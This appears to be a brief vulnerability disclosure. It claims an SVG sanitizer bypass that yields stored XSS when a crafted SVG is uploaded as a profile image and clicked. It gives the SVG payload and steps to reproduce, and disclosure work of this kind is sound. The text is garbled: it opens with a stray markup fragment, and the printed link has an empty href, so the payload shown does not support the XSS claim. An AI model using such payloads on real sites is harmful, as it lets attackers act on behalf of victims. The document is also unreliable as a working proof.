<circle cx="0" cy...">
SVG sanitizer cloud be bypassed via flowing SVG file that leads to stored XSS
<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
<a href>
<circle cx="0" cy="0" r="300"/>
</a>
</svg>
Upload the above SVG file in your profile, view it, and click anywhere on the page then XSS will be triggered :
This vulnerability is capable of performing arbitrary actions on behalf of victims at the client side.